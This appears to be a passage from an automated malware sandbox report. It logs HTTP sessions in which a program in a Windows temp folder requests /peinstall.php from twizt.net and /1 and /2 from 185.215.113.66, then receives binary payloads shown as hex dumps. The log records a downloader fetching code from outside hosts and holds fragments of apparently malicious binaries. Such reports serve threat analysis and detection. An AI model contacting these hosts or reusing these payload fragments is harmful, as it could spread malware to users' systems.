Apr 24, 2024 10:06:58.146650076 CEST	1289	IN	Data Raw: 8d 55 ec 52 e8 42 fa ff ff 83 c4 0c 8b 45 ec 03 45 f4 89 45 ec 8b 4d ec 3b 4d f4 73 09 8b 55 f0 83 c2 01 89 55 f0 8b 45 f8 03 45 e4 8b 4d 08 8b 55 ec 03 14 81 89 55 ec 8b 45 f8 03 45 e4 8b 4d 08 8b 55 ec 3b 14 81 73 09 8b 45 f0 83 c0 01 89 45 f0 Data Ascii: URBEEEM;MsUUEEMUUEEMU;sEEMMUEMMkUUEM3]U8EPMQUREPMQUR}EEPMQjEU+UU}uF}u
Apr 24, 2024 10:06:58.146687031 CEST	1289	IN	Data Raw: 08 8b 45 08 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 08 8b 45 10 50 8b 4d 08 51 8d 55 f8 52 e8 19 f5 ff ff 83 c4 0c 8b 45 fc 3b 45 0c 73 06 33 c0 eb 24 eb 20 8b 4d fc 3b 4d 0c 76 09 b8 01 00 00 00 eb 13 eb 0f 8b 55 f8 3b 55 14 76 Data Ascii: E]UEPMQURE;Es3$ M;MvU;Uv3]U0EEMMEUUE;EsMUEEEEMMU;UEEMUPMUPMQP
Apr 24, 2024 10:06:58.146724939 CEST	1289	IN	Data Raw: 81 00 00 00 00 eb c2 8b 45 10 33 d2 b9 20 00 00 00 f7 f1 89 55 ec 8b 55 14 2b 55 e4 8b 45 0c 8b 14 90 8b 4d ec d3 e2 89 55 e8 83 7d ec 00 74 1e 8b 45 14 50 8b 4d ec 51 8b 55 08 52 8b 45 08 50 e8 64 ff ff ff 83 c4 10 0b 45 e8 89 45 e8 8b 45 e8 eb Data Ascii: E3 UU+UEMU}tEPMQUREPdEEEzMMMU +EEEEMMU;Us6EM#UMUEMMUEMUUE^]UV} EE
Apr 24, 2024 10:06:58.485579014 CEST	1289	IN	Data Raw: 8d 45 fc 50 e8 f7 ea ff ff 83 c4 04 33 c9 75 da 33 c0 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 18 d1 e0 50 e8 a1 ea ff ff 83 c4 04 89 45 fc 8b 4d 18 51 8b 55 10 52 8b 45 0c 50 8b 4d fc 51 e8 e6 ef ff ff 83 c4 10 8b 55 18 52 8b Data Ascii: EP3u3]UQEPEMQUREPMQUREPMQUREP}tMQUREPt3u3]UEPMQUREPMQ]U EEMQEUR
Apr 24, 2024 10:07:02.924985886 CEST	176	OUT	GET /peinstall.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 Host: twizt.net
Apr 24, 2024 10:07:03.365341902 CEST	184	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49713	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:07:08.998130083 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:09.334203959 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:09 GMT Content-Type: application/octet-stream Content-Length: 86272 Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT Connection: keep-alive ETag: "662824e8-15100" Accept-Ranges: bytes Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78 Data Ascii: JM%O;hb>q\|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD\|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb \|Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z!U2;}`Iy2&`h[~W1z[bb7ox
Apr 24, 2024 10:07:09.334244967 CEST	1289	IN	Data Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
Apr 24, 2024 10:07:09.334285021 CEST	1289	IN	Data Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
Apr 24, 2024 10:07:09.334323883 CEST	1289	IN	Data Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#\|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
Apr 24, 2024 10:07:09.334362030 CEST	1289	IN	Data Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52 Data Ascii: hi\|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
Apr 24, 2024 10:07:09.334403038 CEST	1289	IN	Data Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]!qk%wDv
Apr 24, 2024 10:07:09.334443092 CEST	1289	IN	Data Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29 Data Ascii: ySDY'\|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
Apr 24, 2024 10:07:09.334497929 CEST	1289	IN	Data Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d Data Ascii: zXZrE@97M,RgdnfHX\|dgA}3^0J?+i-${2\|w'yc\|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m\|'D^
Apr 24, 2024 10:07:09.334542036 CEST	1289	IN	Data Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5 Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
Apr 24, 2024 10:07:09.334579945 CEST	1289	IN	Data Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9 Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut\|.G%umnnfE~dT=D-%7}=]V#+W$Bh
Apr 24, 2024 10:07:09.669584036 CEST	1289	IN	Data Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49714	185.215.113.66	80	6684	C:\Users\user\AppData\Local\Temp\135143440.exe

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 10:07:11.901932001 CEST	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
Apr 24, 2024 10:07:12.240331888 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 24 Apr 2024 08:07:12 GMT Content-Type: application/octet-stream Content-Length: 86272 Last-Modified: Tue, 23 Apr 2024 21:15:20 GMT Connection: keep-alive ETag: "662824e8-15100" Accept-Ranges: bytes Data Raw: a8 4a f5 c3 4d 1e 89 ed 25 ad 4f 3b 68 ed 08 ba 62 02 f5 3e e5 71 7c d2 8a 81 92 a8 64 31 86 38 dc e1 cd 87 12 04 19 ea d1 c9 79 a1 00 a8 7a b6 06 d8 d2 d1 ad 21 c1 69 e6 d6 73 7e b2 94 f7 80 9f 96 01 92 0f 8b 13 23 cc ff 38 49 0f 77 72 a8 da 4b 60 7b d1 04 ee ff a5 bd 8e cf 56 23 15 db 17 a4 73 e1 bd 8f fe f3 80 6b ec 3f ea d0 f3 21 3e fb 3a e6 f4 0d 0f f0 0c ce 5b c5 d1 c7 9d 08 74 55 7a 82 54 f5 5d 3c b7 18 6e 69 67 6b 3f 75 a1 18 db 21 dd 6a 9a ea b7 d9 50 cc e4 e7 e5 22 d3 3c 53 a6 42 90 c9 d5 08 4e 78 44 15 b0 d8 bf 11 7c 56 cd 0f a1 28 44 ae 62 96 bf f4 fc ef 16 f3 bd b7 1d 44 de c3 a1 21 23 23 fc 67 9c ac 93 34 43 5f 0f 8f b2 fd f7 8c 65 bd 2f 15 e0 fd 81 71 50 7a 3d 53 81 55 c5 77 d6 a0 07 8f 42 a2 b4 18 8a 33 af 44 b2 6b 07 89 00 c0 1c cc ce 53 b0 0f 52 ce f7 63 3f c2 db 1b fc b1 d5 3d 1d 42 1c 82 ac 44 97 03 1c 77 0d 6b 9c b0 2f bb cf ed b5 4c 09 e1 72 99 31 95 9c 7b 73 b7 0a c2 b5 10 b2 4a 9f 67 95 1e e8 81 48 04 52 34 8c 59 e3 30 58 90 ca 24 69 0c b0 4a 33 a0 0c c1 76 c4 90 62 96 1d 8a 1e 09 f9 39 be dc 6d c2 97 a0 77 10 d2 08 01 b2 62 6f be e1 f6 f7 1f a7 65 08 ad 7a 6e bf cd b2 fb 55 9c 62 87 56 eb 2c 61 60 52 08 3a 90 e5 37 02 40 df 6f 74 b3 3b bf 2a e7 47 7a 74 5f 4c b1 f5 ec 9b 7f 43 73 a2 6b ed e6 be e8 c7 6a 4a ea cf 80 8e 68 e3 ff a5 3b 6e d6 29 91 f5 5d e6 48 22 3e c5 72 37 58 b6 4a 03 0c 3f 19 0a d4 79 9e fc 81 35 ce ca 88 5a 9f 27 e0 e2 87 d5 86 4a 4b c9 f4 20 64 dc e4 d5 26 65 eb 09 43 ae a1 26 ec 1a b5 a1 2f db 92 db ee 1c 5a ba 98 65 7e e7 87 da e2 b0 fc e3 90 8b 2c 39 51 9a f3 9e 48 3d 38 9c b6 45 62 0c 6a 63 8e fb 6d df 94 67 86 41 9f 01 54 7b a5 e6 2b d8 7a f1 84 fc 52 c2 33 fd 9c 1d 5a 35 12 6f 9e 42 90 ee 6c a9 0a 2b 43 05 ae a5 bb 4b f7 c6 10 f8 1b 37 57 de 22 ff d5 43 f1 bf eb 24 89 f0 17 6f b2 5f aa 96 b8 a8 69 58 64 cb ac f8 30 91 64 77 39 e7 de fc 05 aa 44 59 3e 23 09 75 9e a2 d2 05 bc 6e 50 e8 72 f6 ee ae 96 0d d8 21 15 51 57 d7 df 22 90 98 d1 4a 32 f6 ff 63 3d dd dc e6 71 7e ab 94 c2 21 7e 76 8a b6 d2 0a 70 9e b0 76 68 4c b0 9c 49 21 9a f3 c5 5f 68 ba e4 b9 a2 2f b5 9f 54 7f 47 fb d0 64 43 66 56 67 81 dd dd 7e 90 2f d5 1a 77 29 0a bd a7 43 5f 38 04 21 58 d6 38 2b 7b 48 40 77 7f 81 86 0f 4a a6 83 bc 73 f8 48 24 1c 42 38 79 9e b9 e1 6c a4 35 66 12 19 54 21 97 7e af 92 02 71 4d 92 62 d4 20 7c 41 f7 b5 62 0c c3 6f b6 fa 9f b3 83 d5 06 c5 df 10 f0 cc 69 18 f0 b1 fc 92 10 40 b8 ca 52 18 e5 1f e4 b1 43 35 fd 31 b0 34 46 98 7b 9b f3 02 05 33 df 66 6e 70 0b 66 0e ed 05 2e 2c 4f 1f 2f a6 89 f2 b1 c4 aa 28 18 75 70 75 2e 03 36 f2 17 cc cd 16 ec 50 6d ee f4 46 74 4f 65 34 be 40 69 91 ed 34 15 69 4d b9 56 4d fd 08 22 4a 9c b2 13 df c8 60 77 fe 51 b1 e0 0d 0d ca 89 8a 4c 73 dc 94 de 64 ce e7 aa 64 99 48 a5 4f 32 22 c6 7a 17 43 d9 bf 6d a7 d6 68 37 17 29 68 e5 2c 8f 88 1c 9b 7a 15 f2 ef 73 92 a5 35 d3 d1 c3 98 34 d6 1b a7 3a db 5a 1e 98 f0 e3 d6 d9 2a fd b6 f0 ba ca 8f c6 b0 ef 11 21 b0 55 03 12 ac 32 b1 84 3b 7d 09 60 0a b7 c4 e6 14 a2 90 f8 49 88 b3 79 d3 8a f0 0a c9 91 32 af 8d c9 26 fb 60 d1 68 5b d8 98 07 fc 19 7e 57 86 31 b5 04 7a fd 5b b3 ac 1e 62 62 16 37 88 e5 10 ad ba 6f 9c 98 78 Data Ascii: JM%O;hb>q\|d18yz!is~#8IwrK`{V#sk?!>:[tUzT]<nigk?u!jP"<SBNxD\|V(DbD!##g4C_e/qPz=SUwB3DkSRc?=BDwk/Lr1{sJgHR4Y0X$iJ3vb9mwboeznUbV,a`R:7@ot;Gzt_LCskjJh;n)]H">r7XJ?y5Z'JK d&eC&/Ze~,9QH=8EbjcmgAT{+zR3Z5oBl+CK7W"C$o_iXd0dw9DY>#unPr!QW"J2c=q~!~vpvhLI!_h/TGdCfVg~/w)C_8!X8+{H@wJsH$B8yl5fT!~qMb \|Aboi@RC514F{3fnpf.,O/(upu.6PmFtOe4@i4iMVM"J`wQLsddHO2"zCmh7)h,zs54:Z!U2;}`Iy2&`h[~W1z[bb7ox
Apr 24, 2024 10:07:12.240355968 CEST	1289	IN	Data Raw: d5 7b 0b 1e 78 9c ea 64 cd 53 48 60 6d 26 78 ad f2 45 08 0c c6 c5 b8 64 c4 4c 5a fe 02 ca 39 88 20 33 ab 45 a2 8c 64 bc 8d b6 05 f6 9d a5 58 39 54 37 1b 66 49 1e 3c 68 64 9f ec f2 5e eb f7 67 f5 3f 90 61 00 12 cf 6c 4b ac b9 ae 8e a0 55 83 e6 df Data Ascii: {xdSH`m&xEdLZ9 3EdX9T7fI<hd^g?alKUw$Ro.ewU7jKLQs?=~c=x+G#s6W.V{r-tFU(FC_/nQaK5T,_2fn0sq_{?*V$,V{gDi
Apr 24, 2024 10:07:12.240401983 CEST	1289	IN	Data Raw: d3 ba 70 f8 7b 03 35 cc af 43 6f 96 fe 29 a4 13 f9 a5 28 c9 f9 63 7b 67 2b eb d0 09 9b 5b 1b ef 51 89 bd 83 f1 27 eb 08 c1 15 b3 4a c8 26 45 e3 c0 aa d5 58 94 33 f2 74 b2 57 37 5a 8b d3 4c c0 38 03 d2 64 c7 b7 c6 bf e7 08 18 8c c4 10 da 14 0b 1f Data Ascii: p{5Co)(c{g+[Q'J&EX3tW7ZL8dI!-Ty'G>)W8r,QE%CIFhF>3ku!Z}5bdr^A^v1")r$MAhehC5q"BU"$tA"
Apr 24, 2024 10:07:12.240461111 CEST	1289	IN	Data Raw: e5 f7 c7 26 bc 85 8a 6c c9 58 78 e2 3e c4 d1 9c 5e 13 f1 b8 f3 3d c1 c1 1a b0 95 ab 3e 96 bb b4 ec d0 8e 14 c0 52 53 0f ca 6a 63 d8 43 ab a0 f9 01 93 f0 18 a9 56 0e 9c 6b 39 49 79 6c aa b2 79 cb fb 1d 18 e3 81 32 de 3a e6 19 41 15 ba 92 06 5d 7d Data Ascii: &lXx>^=>RSjcCVk9Iyly2:A]}-,.!$%G*`O<Qlqt~Xv,l%>8J#\|9tKT><}[^;n]/JuLRg\9SI=$@:@yw3$``T5=9a'gew1
Apr 24, 2024 10:07:12.240525007 CEST	1289	IN	Data Raw: 68 69 89 81 7c 2d 98 58 e2 47 ac 6a d7 bd 10 49 61 d9 ce 1c 44 05 52 88 7f 72 d7 f7 39 59 c9 55 2f c3 1b 07 fd b5 e8 c7 d3 52 32 5d bd fc 01 5c ff ac c9 64 77 ab a9 5b ad a2 0d dd d8 36 ae 57 ad 3e 77 fa 7b a6 54 1f 51 e7 4b 93 50 4a 66 44 3a 52 Data Ascii: hi\|-XGjIaDRr9YU/R2]\dw[6W>w{TQKPJfD:R=u`4nf_t0H[(=m(!Y)Sj0)PR*.FBoLjlGtnNa)9Q_nS4<0ql1('^qzw^ ?}k3KJS<
Apr 24, 2024 10:07:12.240544081 CEST	1289	IN	Data Raw: f2 7d da 93 7a 3a 14 25 2b 44 e3 ab 9b 5a 60 0c ae e0 95 34 a7 43 92 15 80 58 9c 5d ac cf 08 bd b6 75 fb 90 62 4c 39 23 dc 8d f5 44 f2 bd dc 65 c1 d8 1b 97 41 c9 76 8c bf f0 a2 c0 e2 58 d9 2e 5f 8f 50 91 46 17 88 27 54 c2 c0 99 de db cb 81 fd 2b Data Ascii: }z:%+DZ`4CX]ubL9#DeAvX._PF'T+gW+Sfs7AOL#.#Z,#Y6)i%[){#G2/DrWyXTTS_a21zs{DOVX]e){J}Rx}{a]!qk%wDv
Apr 24, 2024 10:07:12.240595102 CEST	1289	IN	Data Raw: ce 1e ad 79 cb c8 53 17 44 a1 fb 59 e4 97 27 7c 4d f1 ee 2e 3f 59 6d 99 27 99 ae 80 74 c9 a1 5e db 58 83 4a d9 f7 c4 43 b2 53 12 d9 ca 23 56 87 1f 61 99 51 97 21 4a fb f1 fe 44 5b 59 6e 44 7a 5d a0 69 d3 99 4b 80 48 a6 cc 67 45 82 d8 79 6a 2f 29 Data Ascii: ySDY'\|M.?Ym't^XJCS#VaQ!JD[YnDz]iKHgEyj/)$FowfW_x"#UU4Ca/H:!]2?3khpQY9bw^S`y6oPFh&iQNm%&gw>>GD`b
Apr 24, 2024 10:07:12.240659952 CEST	1289	IN	Data Raw: b8 1a ef 7a 58 1e 2a 5a f0 ca a0 98 f4 93 fa 72 45 df 40 f4 39 37 e1 f9 0d 4d 2c e2 a7 80 52 67 ff 64 a0 6e cb f7 15 17 66 a9 48 a3 58 85 7c 8e 14 64 16 ef d3 0e fc 99 ed f1 18 a7 67 41 ac 1e 1f 8f 7d 33 8f 5e e2 ba a4 98 30 4a 97 b6 3f 2b 69 2d Data Ascii: zXZrE@97M,RgdnfHX\|dgA}3^0J?+i-${2\|w'yc\|]Agx07MW&<$-+WEd4$ySsh7o%X*D FQA5${`?+L9m\|'D^
Apr 24, 2024 10:07:12.241719007 CEST	1289	IN	Data Raw: 75 5c 5e a0 0b 76 65 93 a0 62 d6 54 b0 02 66 24 b4 8d 51 47 5e 14 01 6e fb 0d 22 05 69 69 05 41 6a 9a d6 7b a2 25 a8 b4 03 44 fc f6 0b 97 87 1f 32 f3 e3 e9 7a e4 b1 f5 00 a9 0d fe 64 a3 f9 bc 8e 83 ea b9 b7 09 87 3c 51 35 b9 6b ad eb 85 d5 24 b5 Data Ascii: u\^vebTf$QG^n"iiAj{%D2zd<Q5k$h!\'0'#ORZo3.,U`9k,zh@NJv:>T<7!QazBdV(>Pg??qL2?Rr)\'[LYM`$
Apr 24, 2024 10:07:12.241787910 CEST	1289	IN	Data Raw: a5 d8 15 2a 35 55 70 8c 74 ac 02 e6 0b c7 b2 65 ec 18 44 cc a0 61 15 44 ab c5 a7 92 a5 c9 e5 73 5c 0a e1 72 bd 6a 4f 72 b8 57 56 47 bf 55 10 96 ba 13 54 e1 d4 0a 19 50 3e 36 02 58 83 4f 97 d7 ce 0c 9c 61 47 53 85 df f9 19 3c d8 cc 9a 11 f5 ce c9 Data Ascii: *5UpteDaDs\rjOrWVGUTP>6XOaGS<S)QGKv3A?)R,YrZBmd.6=\,{'ut\|.G%umnnfE~dT=D-%7}=]V#+W$Bh
Apr 24, 2024 10:07:12.577148914 CEST	1289	IN	Data Raw: dc b2 d8 2f 48 af 15 31 37 75 9b 82 b2 90 3a 8b 99 d6 d0 f7 73 0f 16 fa 34 16 42 6b ba 11 83 7a 5a af 85 2b ba 2f 96 f6 9a 44 06 89 df 25 19 4b b7 62 2e 01 67 be b2 1e ae b4 99 71 f0 2c 33 6e e9 78 d2 39 3e b3 b1 d8 c6 38 47 81 bc 09 26 9c b5 2a Data Ascii: /H17u:s4BkzZ+/D%Kb.gq,3nx9>8G&*?~SDrd g&YF41zFI>lWgy.mfmd&pC?t/VazmMQrI;\BEj[zm}/1M>H%
Apr 24, 2024 10:07:19.066494942 CEST	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Host: 185.215.113.66
